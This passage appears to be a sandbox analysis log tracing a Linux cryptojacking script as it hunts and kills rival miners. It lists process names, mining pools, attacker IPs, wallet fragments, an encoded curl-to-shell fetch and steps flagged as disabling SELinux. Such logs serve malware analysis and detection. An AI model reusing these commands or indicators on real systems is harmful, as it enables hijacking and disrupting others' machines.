  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1423
- /bin/grep
  grep sustse
  2⤵
  PID:1421
- /bin/grep
  grep -v grep
  2⤵
  PID:1420
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1419
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1427
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1428
- /bin/grep
  grep sustse3
  2⤵
  PID:1426
- /bin/grep
  grep -v grep
  2⤵
  PID:1425
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1424
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1433
- /bin/grep
  grep wget
  2⤵
  PID:1432
- /bin/grep
  grep mr.sh
  2⤵
  PID:1431
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1434
- /bin/grep
  grep -v grep
  2⤵
  PID:1430
- /bin/ps
  ps aux
  2⤵
  PID:1429
- /bin/grep
  grep curl
  2⤵
  PID:1438
- /bin/grep
  grep mr.sh
  2⤵
  PID:1437
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1439
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1440
- /bin/grep
  grep -v grep
  2⤵
  PID:1436
- /bin/ps
  ps aux
  2⤵
  PID:1435
- /bin/grep
  grep wget
  2⤵
  PID:1444
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1445
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1443
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1446
- /bin/grep
  grep -v grep
  2⤵
  PID:1442
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1441
- /bin/grep
  grep curl
  2⤵
  PID:1450
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1451
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1449
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1452
- /bin/grep
  grep -v grep
  2⤵
  PID:1448
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1447
- /bin/grep
  grep wget
  2⤵
  PID:1456
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1455
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1457
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1458
- /bin/grep
  grep -v grep
  2⤵
  PID:1454
- /bin/ps
  ps aux
  2⤵
  PID:1453
- /bin/grep
  grep curl
  2⤵
  PID:1462
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1463
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1461
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1464
- /bin/grep
  grep -v grep
  2⤵
  PID:1460
- /bin/ps
  ps aux
  2⤵
  PID:1459
- /bin/grep
  grep wget
  2⤵
  PID:1468
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1467
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1469
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1470
- /bin/grep
  grep -v grep
  2⤵
  PID:1466
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1465
- /bin/grep
  grep curl
  2⤵
  PID:1474
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1475
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1473
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1476
- /bin/grep
  grep -v grep
  2⤵
  PID:1472
- /bin/ps
  ps aux
  2⤵
  PID:1471
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1480
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1481
- /bin/grep
  grep j2.conf
  2⤵
  PID:1479
- /bin/grep
  grep -v grep
  2⤵
  PID:1478
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1477
- /bin/grep
  grep wget
  2⤵
  PID:1485
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1486
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1484
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1487
- /bin/grep
  grep -v grep
  2⤵
  PID:1483
- /bin/ps
  ps aux
  2⤵
  PID:1482
- /bin/grep
  grep curl
  2⤵
  PID:1491
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1490
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1492
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1493
- /bin/grep
  grep -v grep
  2⤵
  PID:1489
- /bin/ps
  ps aux
  2⤵
  PID:1488
- /bin/grep
  grep wget
  2⤵
  PID:1497
- /bin/grep
  grep ficov
  2⤵
  PID:1496
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1498
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1499
- /bin/grep
  grep -v grep
  2⤵
  PID:1495
- /bin/ps
  ps aux
  2⤵
  PID:1494
- /bin/grep
  grep curl
  2⤵
  PID:1503
- /bin/grep
  grep ficov
  2⤵
  PID:1502
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1504
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1505
- /bin/grep
  grep -v grep
  2⤵
  PID:1501
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1500
- /bin/grep
  grep wget
  2⤵
  PID:1509
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1510
- /bin/grep
  grep he.sh
  2⤵
  PID:1508
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1511
- /bin/grep
  grep -v grep
  2⤵
  PID:1507
- /bin/ps
  ps aux
  2⤵
  PID:1506
- /bin/grep
  grep curl
  2⤵
  PID:1515
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1516
- /bin/grep
  grep he.sh
  2⤵
  PID:1514
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1517
- /bin/grep
  grep -v grep
  2⤵
  PID:1513
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1512
- /bin/grep
  grep miner.sh
  2⤵
  PID:1520
- /bin/grep
  grep wget
  2⤵
  PID:1521
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1522
- /bin/grep
  grep -v grep
  2⤵
  PID:1519
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1523
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1518
- /bin/grep
  grep miner.sh
  2⤵
  PID:1526
- /bin/grep
  grep curl
  2⤵
  PID:1527
- /bin/grep
  grep -v grep
  2⤵
  PID:1525
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1528
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1529
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1524
- /bin/grep
  grep nullcrew
  2⤵
  PID:1532
- /bin/grep
  grep wget
  2⤵
  PID:1533
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1534
- /bin/grep
  grep -v grep
  2⤵
  PID:1531
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1535
- /bin/ps
  ps aux
  2⤵
  PID:1530
- /bin/grep
  grep curl
  2⤵
  PID:1539
- /bin/grep
  grep nullcrew
  2⤵
  PID:1538
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1540
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1541
- /bin/grep
  grep -v grep
  2⤵
  PID:1537
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1536
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1545
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:1544
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1546
- /bin/grep
  grep -v grep
  2⤵
  PID:1543
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1542
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1550
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:1549
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1551
- /bin/grep
  grep -v grep
  2⤵
  PID:1548
- /bin/ps
  ps aux
  2⤵
  PID:1547
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1555
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1556
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:1554
- /bin/grep
  grep -v grep
  2⤵
  PID:1553
- /bin/ps
  ps aux
  2⤵
  PID:1552
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1560
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1561
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:1559
- /bin/grep
  grep -v grep
  2⤵
  PID:1558
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1557
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1565
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1566
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:1564
- /bin/grep
  grep -v grep
  2⤵
  PID:1563
- /bin/ps
  ps aux
  2⤵
  PID:1562
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1570
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1571
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1569
- /bin/grep
  grep -v grep
  2⤵
  PID:1568
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1567
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1575
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1576
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:1574
- /bin/grep
  grep -v grep
  2⤵
  PID:1573
- /bin/ps
  ps auxf
  2⤵
  PID:1572
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1580
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1581
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:1579
- /bin/grep
  grep -v grep
  2⤵
  PID:1578
- /bin/ps
  ps auxf
  2⤵
  PID:1577
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1585
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1586
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:1584
- /bin/grep
  grep -v grep
  2⤵
  PID:1583
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1582
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1590
- /bin/grep
  grep monerohash.com
  2⤵
  PID:1589
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1591
- /bin/grep
  grep -v grep
  2⤵
  PID:1588
- /bin/ps
  ps auxf
  2⤵
  PID:1587
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1595
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1596
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  - Disables SELinux
  PID:1594
- /bin/grep
  grep -v grep
  2⤵
  PID:1593
- /bin/ps
  ps auxf
  2⤵
  PID:1592
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1600
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1601
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:1599
- /bin/grep
  grep -v grep
  2⤵
  PID:1598
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1597
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1605
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:1604
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1606
- /bin/grep
  grep -v grep
  2⤵
  PID:1603
- /bin/ps
  ps auxf
  2⤵
  PID:1602
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1610
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:1609
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1611
- /bin/grep
  grep -v grep
  2⤵
  PID:1608
- /bin/ps
  ps auxf
  2⤵
  PID:1607
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1615
- - /usr/local/sbin/kill
    kill -9 1613
    3⤵
    PID:1616
- - /usr/local/bin/kill
    kill -9 1613
    3⤵
    PID:1616
- - /usr/sbin/kill
    kill -9 1613
    3⤵
    PID:1616
- - /usr/bin/kill
    kill -9 1613
    3⤵
    PID:1616
- - /sbin/kill
    kill -9 1613
    3⤵
    PID:1616
- - /bin/kill
    kill -9 1613
    3⤵
    PID:1616
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1614
- /bin/grep
  grep xiaoyao
  2⤵
  PID:1613
- /bin/ps
  ps auxf
  2⤵
  PID:1612
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1620
- - /usr/local/sbin/kill
    kill -9 1618
    3⤵
    PID:1621
- - /usr/local/bin/kill
    kill -9 1618
    3⤵
    PID:1621
- - /usr/sbin/kill
    kill -9 1618
    3⤵
    PID:1621
- - /usr/bin/kill
    kill -9 1618
    3⤵
    PID:1621
- - /sbin/kill
    kill -9 1618
    3⤵
    PID:1621
- - /bin/kill
    kill -9 1618
    3⤵
    - Reads CPU attributes
    PID:1621
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1619
- /bin/grep
  grep xiaoxue
  2⤵
  PID:1618
- /bin/ps
  ps auxf
  2⤵
  PID:1617
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1624
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1625
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1626
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:1623
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1627
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1631
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1630
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1632
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1629
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1633
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1635
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:1634
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1637
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  PID:1636
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1639
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:1638
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1641
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  - Reads CPU attributes
  PID:1640
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1643
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  PID:1642
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1645
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  PID:1644
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1647
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  - Reads CPU attributes
  PID:1646
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1649
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  PID:1648
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1651
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  PID:1650
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1653
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  - Reads CPU attributes
  PID:1652
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1655
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  - Reads CPU attributes
  PID:1654
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1657
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  PID:1656
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1659
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  PID:1658
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1661
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  - Reads CPU attributes
  PID:1660
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1663
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  - Reads runtime system information
  PID:1662
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1665
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  PID:1664
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1667
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  PID:1666
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1669
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  - Reads CPU attributes
  PID:1668
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1671
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  PID:1670
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1673
- /usr/bin/pgrep
  pgrep -f ./vsp
  2⤵
  PID:1672
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1675
- /usr/bin/pgrep
  pgrep -f ./jvs
  2⤵
  PID:1674
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1677
- /usr/bin/pgrep
  pgrep -f ./pvv
  2⤵
  - Reads runtime system information
  PID:1676
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1679
- /usr/bin/pgrep
  pgrep -f ./vpp
  2⤵
  PID:1678
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1681
- /usr/bin/pgrep
  pgrep -f ./pces
  2⤵
  - Reads runtime system information
  PID:1680
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1683
- /usr/bin/pgrep
  pgrep -f ./rspce
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1682
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1685
- /usr/bin/pgrep
  pgrep -f ./haveged
  2⤵
  PID:1684
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1687
- /usr/bin/pgrep
  pgrep -f ./jiba
  2⤵
  - Reads CPU attributes
  PID:1686
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1689
- /usr/bin/pgrep
  pgrep -f ./watchbog
  2⤵
  - Reads runtime system information
  PID:1688
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1691
- /usr/bin/pgrep
  pgrep -f ./A7mA5gb
  2⤵
  PID:1690
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1693
- /usr/bin/pgrep
  pgrep -f kacpi_svc
  2⤵
  PID:1692
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1695
- /usr/bin/pgrep
  pgrep -f kswap_svc
  2⤵
  PID:1694
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1697
- /usr/bin/pgrep
  pgrep -f kauditd_svc
  2⤵
  PID:1696
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1699
- /usr/bin/pgrep
  pgrep -f kpsmoused_svc
  2⤵
  - Reads CPU attributes
  PID:1698
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1701
- /usr/bin/pgrep
  pgrep -f kseriod_svc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1700
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1703
- /usr/bin/pgrep
  pgrep -f kthreadd_svc
  2⤵
  PID:1702
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1705
- /usr/bin/pgrep
  pgrep -f ksoftirqd_svc
  2⤵
  - Reads runtime system information
  PID:1704
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1707
- /usr/bin/pgrep
  pgrep -f kintegrityd_svc
  2⤵
  PID:1706
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1709
- /usr/bin/pgrep
  pgrep -f jawa
  2⤵
  PID:1708
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1711
- /usr/bin/pgrep
  pgrep -f oracle.jpg
  2⤵
  - Reads runtime system information
  PID:1710
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1713
- /usr/bin/pgrep
  pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
  2⤵
  PID:1712
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1715
- /usr/bin/pgrep
  pgrep -f 188.209.49.54
  2⤵
  PID:1714
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1717
- /usr/bin/pgrep
  pgrep -f 181.214.87.241
  2⤵
  PID:1716
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1719
- /usr/bin/pgrep
  pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
  2⤵
  PID:1718
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1721
- /usr/bin/pgrep
  pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
  2⤵
  PID:1720
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1723
- /usr/bin/pgrep
  pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
  2⤵
  PID:1722
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1725
- /usr/bin/pgrep
  pgrep -f servim
  2⤵
  - Reads runtime system information
  PID:1724
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1727
- /usr/bin/pgrep
  pgrep -f kblockd_svc
  2⤵
  - Reads CPU attributes
  PID:1726
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1729
- /usr/bin/pgrep
  pgrep -f native_svc
  2⤵
  PID:1728
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1731
- /usr/bin/pgrep
  pgrep -f ynn
  2⤵
  PID:1730
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1733
- /usr/bin/pgrep
  pgrep -f 65ccEJ7
  2⤵
  PID:1732
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1735
- /usr/bin/pgrep
  pgrep -f jmxx
  2⤵
  PID:1734
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1737
- /usr/bin/pgrep
  pgrep -f 2Ne80nA
  2⤵
  PID:1736
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1739
- /usr/bin/pgrep
  pgrep -f sysstats
  2⤵
  PID:1738
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1741
- /usr/bin/pgrep
  pgrep -f systemxlv
  2⤵
  - Reads runtime system information
  PID:1740
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1743
- /usr/bin/pgrep
  pgrep -f watchbog
  2⤵
  PID:1742
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1745
- /usr/bin/pgrep
  pgrep -f OIcJi1m
  2⤵
  PID:1744
- /usr/bin/pkill
  pkill -f biosetjenkins
  2⤵
  PID:1746
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  PID:1747
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  PID:1748
- /usr/bin/pkill
  pkill -f mixnerdx
  2⤵
  - Reads runtime system information
  PID:1749
- /usr/bin/pkill
  pkill -f performedl
  2⤵
  - Reads runtime system information
  PID:1750
- /usr/bin/pkill
  pkill -f JnKihGjn
  2⤵
  PID:1751
- /usr/bin/pkill
  pkill -f irqba2anc1
  2⤵
  PID:1752
- /usr/bin/pkill
  pkill -f irqba5xnc1
  2⤵
  - Reads CPU attributes
  PID:1753
- /usr/bin/pkill
  pkill -f irqbnc1
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1754
- /usr/bin/pkill
  pkill -f ir29xc1
  2⤵
  - Reads CPU attributes
  PID:1755
- /usr/bin/pkill
  pkill -f conns
  2⤵
  PID:1756
- /usr/bin/pkill
  pkill -f irqbalance
  2⤵
  PID:1757
- /usr/bin/pkill
  pkill -f XJnRj
  2⤵
  - Reads CPU attributes
  PID:1758
- /usr/bin/pkill
  pkill -f mgwsl
  2⤵
  PID:1759
- /usr/bin/pkill
  pkill -f pythno
  2⤵
  - Reads runtime system information
  PID:1760
- /usr/bin/pkill
  pkill -f jweri
  2⤵
  PID:1761
- /usr/bin/pkill
  pkill -f lx26
  2⤵
  PID:1762
- /usr/bin/pkill
  pkill -f NXLAi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1763
- /usr/bin/pkill
  pkill -f BI5zj
  2⤵
  PID:1764
- /usr/bin/pkill
  pkill -f askdljlqw
  2⤵
  PID:1765
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:1766
- /usr/bin/pkill
  pkill -f minergate
  2⤵
  - Reads CPU attributes
  PID:1767
- /usr/bin/pkill
  pkill -f Guard.sh
  2⤵
  PID:1768
- /usr/bin/pkill
  pkill -f ysaydh
  2⤵
  - Reads runtime system information
  PID:1769
- /usr/bin/pkill
  pkill -f bonns
  2⤵
  PID:1770
- /usr/bin/pkill
  pkill -f donns
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1771
- /usr/bin/pkill
  pkill -f kxjd
  2⤵
  PID:1772
- /usr/bin/pkill
  pkill -f Duck.sh
  2⤵
  PID:1773
- /usr/bin/pkill
  pkill -f bonn.sh
  2⤵
  PID:1774
- /usr/bin/pkill
  pkill -f conn.sh
  2⤵
  - Reads runtime system information
  PID:1775
- /usr/bin/pkill
  pkill -f kworker34
  2⤵
  - Reads runtime system information
  PID:1776
- /usr/bin/pkill
  pkill -f kw.sh
  2⤵
  PID:1777
- /usr/bin/pkill
  pkill -f pro.sh
  2⤵
  - Reads runtime system information
  PID:1778
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  - Reads CPU attributes
  PID:1779
- /usr/bin/pkill
  pkill -f acpid
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1780
- /usr/bin/pkill
  pkill -f icb5o
  2⤵
  PID:1781
- /usr/bin/pkill
  pkill -f nopxi
  2⤵
  - Reads runtime system information
  PID:1782
- /usr/bin/pkill
  pkill -f irqbalanc1
  2⤵
  PID:1783
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  - Reads CPU attributes
  PID:1784
- /usr/bin/pkill
  pkill -f i586
  2⤵
  PID:1785
- /usr/bin/pkill
  pkill -f gddr
  2⤵
  PID:1786
- /usr/bin/pkill
  pkill -f mstxmr
  2⤵
  PID:1787
- /usr/bin/pkill
  pkill -f ddg.2011
  2⤵
  PID:1788
- /usr/bin/pkill
  pkill -f wnTKYg
  2⤵
  - Reads runtime system information
  PID:1789
- /usr/bin/pkill
  pkill -f deamon
  2⤵
  - Reads runtime system information
  PID:1790
- /usr/bin/pkill
